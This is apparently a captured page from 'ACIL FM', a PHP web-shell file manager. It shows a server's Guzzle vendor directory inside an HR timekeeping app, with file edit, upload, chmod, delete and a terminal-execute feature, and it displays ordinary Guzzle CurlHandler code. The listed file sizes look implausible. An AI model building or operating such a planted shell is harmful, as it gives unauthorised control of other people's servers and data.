ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/timbrature/NH-HR-test/vendor/guzzlehttp/guzzle/src/Handler
/
home
mhhtmff
timbrature
NH-HR-test
vendor
guzzlehttp
guzzle
src
Handler
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
CurlFactory.php
28.21 MB
chmod
View
DL
Edit
Rename
Delete
CurlFactoryInterface.php
682 B
chmod
View
DL
Edit
Rename
Delete
CurlHandler.php
1.35 MB
chmod
View
DL
Edit
Rename
Delete
CurlMultiHandler.php
8.77 MB
chmod
View
DL
Edit
Rename
Delete
EasyHandle.php
2.94 MB
chmod
View
DL
Edit
Rename
Delete
HeaderProcessor.php
1.07 MB
chmod
View
DL
Edit
Rename
Delete
MockHandler.php
6.46 MB
chmod
View
DL
Edit
Rename
Delete
Proxy.php
2.28 MB
chmod
View
DL
Edit
Rename
Delete
StreamHandler.php
21.71 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/timbrature/NH-HR-test/vendor/guzzlehttp/guzzle/src/Handler/CurlHandler.php
<?php namespace GuzzleHttp\Handler; use GuzzleHttp\Promise\PromiseInterface; use Psr\Http\Message\RequestInterface; /** * HTTP handler that uses cURL easy handles as a transport layer. * * When using the CurlHandler, custom curl options can be specified as an * associative array of curl option constants mapping to values in the * **curl** key of the "client" key of the request. * * @final */ class CurlHandler { /** * @var CurlFactoryInterface */ private $factory; /** * Accepts an associative array of options: * * - handle_factory: Optional curl factory used to create cURL handles. * * @param array{handle_factory?: ?CurlFactoryInterface} $options Array of options to use with the handler */ public function __construct(array $options = []) { $this->factory = $options['handle_factory'] ?? new CurlFactory(3); } public function __invoke(RequestInterface $request, array $options): PromiseInterface { if (isset($options['delay'])) { \usleep($options['delay'] * 1000); } $easy = $this->factory->create($request, $options); \curl_exec($easy->handle); $easy->errno = \curl_errno($easy->handle); return CurlFactory::finish($this, $easy, $this->factory); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply